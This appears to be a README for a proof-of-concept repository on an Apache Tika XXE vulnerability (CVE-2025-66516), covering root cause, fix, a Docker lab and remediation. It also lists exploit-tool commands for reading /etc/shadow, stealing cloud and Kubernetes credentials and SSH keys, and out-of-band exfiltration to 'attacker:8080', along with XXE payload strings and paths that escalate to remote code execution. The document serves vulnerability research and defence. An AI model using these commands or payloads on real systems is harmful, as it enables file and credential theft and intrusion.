chasingimpact/CVE-2025-66516-Writeup-POC

CVE-2025-66516: Critical XXE Vulnerability in Apache Tika


Executive Summary

CVE-2025-66516 is a critical XML External Entity (XXE) injection vulnerability in Apache Tika with a CVSS score of 10.0 (maximum severity). The vulnerability allows remote attackers to read arbitrary files, perform Server-Side Request Forgery (SSRF), and exfiltrate sensitive data by uploading a specially crafted PDF document containing malicious XFA (XML Forms Architecture) content.

| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-66516 |
| CVSS Score | 10.0 (Critical) |
| Disclosed | December 4, 2025 |
| Vendor | Apache Software Foundation |
| Affected Product | Apache Tika |
| Attack Vector | Network (Remote) |
| Authentication | None Required |

Affected Versions

| Component | Vulnerable Versions | Fixed Version |
|---|---|---|
| tika-core | 1.13 - 3.2.1 | 3.2.2+ |
| tika-parser-pdf-module | 2.0.0 - 3.2.1 | 3.2.2+ |
| tika-parsers | 1.13 - 1.28.5 | 2.0.0+ |

Important: This CVE supersedes CVE-2025-54988, which incorrectly identified only the PDF module as vulnerable. The actual vulnerability resides in tika-core.
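
The version ranges in the table above can be turned into a quick triage check. The following is a minimal sketch, not an official tool: the `AFFECTED` mapping only restates the table, `parse_version` and `is_affected` are hypothetical helper names, and only plain dotted numeric versions are handled (qualified versions such as betas are assumed out of scope and raise `ValueError`).

```python
# Affected ranges copied from the table above (inclusive on both ends).
AFFECTED = {
    "tika-core": ("1.13", "3.2.1"),
    "tika-parser-pdf-module": ("2.0.0", "3.2.1"),
    "tika-parsers": ("1.13", "1.28.5"),
}


def parse_version(text):
    """Turn '1.13' into (1, 13, 0) so versions compare numerically."""
    parts = [int(p) for p in text.split(".")]
    # Pad to three components so '1.13' and '1.13.0' compare as equal.
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(artifact, version):
    """Return True if the artifact/version pair falls in a listed range."""
    if artifact not in AFFECTED:
        return False
    low, high = AFFECTED[artifact]
    return parse_version(low) <= parse_version(version) <= parse_version(high)


if __name__ == "__main__":
    for artifact, version in [("tika-core", "3.2.1"), ("tika-core", "3.2.2")]:
        print(artifact, version, "affected" if is_affected(artifact, version) else "not listed")
```

A result of "not listed" only means the pair is outside the ranges in the table; it says nothing about other Tika components on the classpath.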


Technical Analysis

The Vulnerability

The vulnerability is an XML External Entity (XXE) injection flaw in how Apache Tika processes XFA (XML Forms Architecture) data within PDF documents.

The Problem: Tika relies on an underlying Java XML parser (specifically a StAX parser) to read XFA XML content. Vulnerable versions did not configure that parser to disable external entity resolution. When the parser encounters an external entity declaration (such as SYSTEM "file:///etc/passwd"), it resolves the entity and substitutes the file contents into the parsed document, where they surface in Tika's extracted output.

Location: The bug exists in XMLReaderUtils.getXMLInputFactory() in tika-core:

public static XMLInputFactory getXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newFactory();
    tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
    tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
    // Intended to block XXE, but ineffective with the JDK's default StAX parser
    factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER);
    return factory;
}

The IGNORING_STAX_ENTITY_RESOLVER was intended to block XXE by returning an empty result, but it returned a String instead of the expected InputStream. The JDK's default StAX parser silently ignored this incorrect return type and fell back to default behavior, which resolves external entities.

The Fix (Tika 3.2.2)

The fix explicitly disables DTD and external entity support at the factory level:

tryToSetStaxProperty(factory, XMLInputFactory.SUPPORT_DTD, false);
tryToSetStaxProperty(factory, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

The resolver was also changed to return an InputStream, the type the JDK's StAX parser expects.

The Incidental Woodstox Protection

In the Java ecosystem, multiple XML parser libraries exist. Applications use whichever parser is configured or found first on the classpath.

What is Woodstox? Woodstox is a high-performance, open-source StAX XML parser commonly bundled with Java applications.

How it provides protection: Woodstox handles the XMLResolver return value differently from the JDK parser. When it receives the String returned by IGNORING_STAX_ENTITY_RESOLVER, it treats it as valid empty content, so the entity expands to nothing and the XXE is blocked. This is deliberate behavior on Woodstox's part (by design, not by accident); the protection is incidental only from Tika's point of view.

Critical distinction:

  • tika-server-standard.jar bundles Woodstox - NOT VULNERABLE
  • tika-core + parser modules (embedded usage) does NOT bundle Woodstox - VULNERABLE
  • Applications using JDK's default StAX parser - VULNERABLE
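
To get a first impression of which of the cases above a deployment falls into, the JAR names in its library directory can be inspected. This is a rough sketch under stated assumptions: `triage_jars` and its return labels are hypothetical, JARs are assumed to follow the usual `artifact-version.jar` naming, and finding Woodstox on disk does not prove it is the StAX implementation the application actually selects at runtime.

```python
import re

# Matches names such as "tika-core-2.9.2.jar" or "woodstox-core-6.5.1.jar".
# The optional "-asl" suffix covers older Woodstox artifact names.
JAR_PATTERN = re.compile(
    r"^(tika-core|woodstox-core(?:-asl)?)-(\d+(?:\.\d+)*)[^/]*\.jar$"
)


def triage_jars(jar_names):
    """Classify a list of JAR file names by Tika/Woodstox presence."""
    versions = {}
    for name in jar_names:
        match = JAR_PATTERN.match(name)
        if match:
            key = "woodstox" if match.group(1).startswith("woodstox") else "tika-core"
            versions[key] = match.group(2)
    if "tika-core" not in versions:
        return "no-tika-core"
    if "woodstox" in versions:
        return "tika-core-with-woodstox"
    return "tika-core-without-woodstox"


if __name__ == "__main__":
    print(triage_jars(["tika-core-2.9.2.jar", "pdfbox-2.0.29.jar"]))
```

In practice the input would come from something like `os.listdir()` on the application's library directory. A "tika-core-with-woodstox" result is a reason to investigate further, not a substitute for upgrading.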

Quick Start

Test the Vulnerability

# 1. Start the lab environment
docker-compose up -d --build

# 2. Test against vulnerable Tika (JDK StAX, port 9997)
python poc/exploit.py --url http://localhost:9997 --check

# 3. Extract /etc/passwd
python poc/exploit.py --url http://localhost:9997 --file /etc/passwd

# 4. Compare with protected Tika (Woodstox, port 9998)
python poc/exploit.py --url http://localhost:9998 --check

Lab Environment

Directory Structure

CVE-2025-66516/
|-- docker-compose.yml              # Lab orchestration
|-- vulnerable-tika/
|   |-- Dockerfile                  # Tika with Woodstox (protected)
|   +-- Dockerfile.jdk-stax         # Tika without Woodstox (VULNERABLE)
|-- webapp/
|   |-- Dockerfile
|   |-- app.py                      # Flask upload application
|   +-- templates/
|-- poc/
|   |-- exploit.py                  # Automated exploitation tool
|   +-- generate_payload.py         # Malicious PDF generator
+-- README.md

Services

| Service | Port | Description |
|---|---|---|
| Web Application | 8080 | Document upload frontend |
| Tika (Woodstox) | 9998 | Protected - NOT vulnerable |
| Tika (JDK StAX) | 9997 | VULNERABLE - No Woodstox |
| Attacker Listener | 9999 | HTTP server for OOB testing |

Starting the Lab

docker-compose up -d --build

Proof of Concept Tools

1. Automated Exploitation Tool (exploit.py)

Full-chain exploitation with automatic payload generation and data extraction.

# Check if target is vulnerable
python poc/exploit.py --url http://target:9998 --check

# Read local files
python poc/exploit.py --url http://target:9998 --file /etc/passwd
python poc/exploit.py --url http://target:9998 --file /etc/shadow

# AWS metadata theft (EC2 instances)
python poc/exploit.py --url http://target:9998 --aws-metadata

# Kubernetes secrets
python poc/exploit.py --url http://target:9998 --k8s-secrets

# SSRF to internal services
python poc/exploit.py --url http://target:9998 --ssrf http://internal:8080/admin

# Save extracted data
python poc/exploit.py --url http://target:9998 --file /etc/passwd --save loot.txt

2. Payload Generator (generate_payload.py)

Generates malicious PDF files for manual testing or integration with other tools.

# Generate payload for specific file
python poc/generate_payload.py --target /etc/passwd --output exploit.pdf

# Generate SSRF payload
python poc/generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf

# Generate OOB exfiltration payload
python poc/generate_payload.py --target /etc/passwd --callback http://attacker:8080 --output oob.pdf

# Use attack mode presets
python poc/generate_payload.py --mode aws_metadata --output aws.pdf
python poc/generate_payload.py --mode k8s_secrets --all-targets --output ./payloads/

# List available attack modes
python poc/generate_payload.py --list-modes

Available Attack Modes:

  • file_read - Read local files (/etc/passwd, /etc/shadow, etc.)
  • ssh_keys - Steal SSH private keys
  • aws_metadata - AWS EC2 metadata and IAM credentials
  • gcp_metadata - GCP service account tokens
  • azure_metadata - Azure managed identity tokens
  • k8s_secrets - Kubernetes service account credentials
  • webapp_configs - Common web application configs
  • ssrf_internal - Probe internal services

Testing Results

Vulnerable Configuration (JDK StAX - No Woodstox)

Testing against Tika 2.9.2 without Woodstox (simulating embedded deployments):

| Test | Result |
|---|---|
| XFA Detection | [PASS] PDF recognized as having XFA |
| XFA Parsing | [PASS] XFA content extracted |
| XXE File Read | [VULNERABLE] /etc/passwd contents exfiltrated |
| XXE SSRF | [VULNERABLE] External requests sent |

Proof of Exploitation:

<li fieldName="data">data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Protected Configuration (Woodstox StAX)

Testing against Tika 2.9.2 with Woodstox (standard tika-server-standard.jar):

| Test | Result |
|---|---|
| XFA Detection | [PASS] PDF recognized as having XFA |
| XFA Parsing | [PASS] XFA content extracted |
| XXE File Read | [BLOCKED] External entities not resolved |
| XXE SSRF | [BLOCKED] No outbound connections |

Output shows empty entity:

<li fieldName="data">data: </li>

Conclusion

The vulnerability is real and critical. Exploitation depends on the StAX implementation:

  • [PROTECTED] tika-server-standard.jar - Bundled Woodstox blocks XXE
  • [VULNERABLE] Embedded Tika (tika-core + parsers) - Uses JDK StAX by default
  • [VULNERABLE] Custom deployments without Woodstox
  • [VULNERABLE] Enterprise integrations (Elasticsearch, Solr, Alfresco) - Often use embedded Tika

XXE Attack Capabilities

XXE is fundamentally a file read/SSRF vulnerability, not direct RCE. However, it enables several attack paths:

Direct Attacks

| Attack | Payload Example |
|---|---|
| File Read | SYSTEM "file:///etc/passwd" |
| SSRF | SYSTEM "http://internal:8080/admin" |
| AWS Metadata | SYSTEM "http://169.254.169.254/latest/meta-data/" |

Escalation to RCE

| Scenario | Attack Path |
|---|---|
| AWS EC2 | XXE -> SSRF to metadata -> IAM credentials -> AWS CLI RCE |
| Kubernetes | XXE -> Read service account token -> kubectl exec |
| Internal Jenkins | XXE -> SSRF to script console -> Groovy RCE |
| Database | XXE -> Read config files -> Database access |
| SSH | XXE -> Read SSH keys -> Remote shell access |

Remediation

Immediate Actions

  1. Upgrade Apache Tika to version 3.2.2 or later

    <dependency>
        <groupId>org.apache.tika</groupId>
        <artifactId>tika-core</artifactId>
        <version>3.2.2</version>
    </dependency>
  2. Verify all Tika components are updated (tika-core AND parser modules)
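
Checking that every Tika component was updated can be partly automated for Maven projects. The sketch below is one possible approach, not part of this repository: `tika_dependencies_below_fix` is a hypothetical helper, the POM is assumed to use the standard Maven 4.0.0 namespace, and versions that are property references or are inherited from a parent are reported as-is rather than resolved.

```python
import xml.etree.ElementTree as ET

POM_NS = {"m": "http://maven.apache.org/POM/4.0.0"}
FIXED_VERSION = (3, 2, 2)  # first fixed release named in this writeup


def tika_dependencies_below_fix(pom_text):
    """Return (artifactId, version) pairs for org.apache.tika dependencies
    that are older than 3.2.2 or whose version could not be parsed."""
    root = ET.fromstring(pom_text)
    findings = []
    for dep in root.iterfind(".//m:dependency", POM_NS):
        group = dep.findtext("m:groupId", default="", namespaces=POM_NS).strip()
        if group != "org.apache.tika":
            continue
        artifact = dep.findtext("m:artifactId", default="", namespaces=POM_NS).strip()
        version = dep.findtext("m:version", default="", namespaces=POM_NS).strip()
        try:
            parsed = tuple(int(part) for part in version.split("."))
        except ValueError:
            # Property reference, qualifier, or missing version: needs manual review.
            findings.append((artifact, version or "unresolved"))
            continue
        if parsed < FIXED_VERSION:
            findings.append((artifact, version))
    return findings
```

An empty result means no directly declared Tika dependency is below 3.2.2; transitive dependencies still need a separate check, for example with Maven's dependency tree output.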

Risk Assessment

| Deployment Type | Risk Level |
|---|---|
| tika-server-standard.jar | LOW - Woodstox mitigates |
| Embedded Tika (library usage) | HIGH - Likely vulnerable |
| Custom without Woodstox | HIGH - Vulnerable |

Defense in Depth

  1. Input Validation - Validate uploaded file types
  2. Network Segmentation - Isolate Tika processing
  3. Least Privilege - Minimal filesystem permissions
  4. Monitoring - Alert on unusual file access
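
As an illustration of the input validation item, an upload handler could flag PDFs that both reference XFA and carry a DTD or entity declaration in one of their streams before handing them to Tika. This is a heuristic sketch only: the function names are hypothetical, the stream regex is a simplification of the PDF format, and content hidden in object streams or behind filters other than Flate would be missed, so it complements upgrading rather than replacing it.

```python
import re
import zlib

# Simplified view of a PDF stream object: "stream", EOL, body, EOL, "endstream".
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# Declarations that legitimate XFA forms should not need.
SUSPICIOUS_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def iter_stream_bodies(pdf_bytes):
    """Yield each stream body raw and, where possible, Flate-decompressed."""
    for match in STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        yield raw
        try:
            # decompressobj tolerates a truncated trailer, unlike zlib.decompress.
            yield zlib.decompressobj().decompress(raw)
        except zlib.error:
            pass  # not Flate data; the raw body was already yielded


def looks_like_xfa_xxe(pdf_bytes):
    """Return True if the PDF mentions /XFA and any stream declares a DTD or entity."""
    if b"/XFA" not in pdf_bytes:
        return False
    return any(SUSPICIOUS_RE.search(body) for body in iter_stream_bodies(pdf_bytes))
```

Files that trip the check could be rejected or routed to manual review; files that pass it are not thereby proven safe.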

Research Journey

Issues Encountered

Issue 1: Initial exploit did not work

  • XFA was detected but XXE never triggered
  • Spent time debugging payload structure

Issue 2: Multiple XML declarations error

  • Error: WstxParsingException: Illegal processing instruction target ("xml")
  • Cause: XFA streams were each including XML declarations
  • Fix: Only include declaration in preamble, not sub-streams

Issue 3: The Woodstox mystery

  • All payloads failed against tika-server-standard.jar
  • Discovered Woodstox was bundled and blocking XXE
  • Created Dockerfile.jdk-stax to test without Woodstox

Issue 4: Testing wrong configuration

  • Wasted time on protected configuration
  • Lesson: Understand the full dependency tree before testing

Lessons Learned

  1. CVSS scores need context - Environmental factors affect exploitability
  2. Test minimal configurations - Don't assume bundled dependencies
  3. XML parsers vary wildly - Same code behaves differently with different parsers
  4. Embedded != Server - Library usage often has different dependencies
  5. Error messages are clues - Parser exceptions reveal implementation details

References

Timeline

| Date | Event |
|---|---|
| August 2025 | CVE-2025-54988 disclosed (incomplete scope) |
| December 4, 2025 | CVE-2025-66516 published (full scope identified) |
| December 4, 2025 | Apache Tika 3.2.2 released with fix |

Disclaimer

This lab environment and proof-of-concept code are provided for authorized security testing, educational purposes, and defensive research only.

Do not use these tools against systems without explicit written authorization.

License

This research material is provided for educational purposes. Use responsibly.
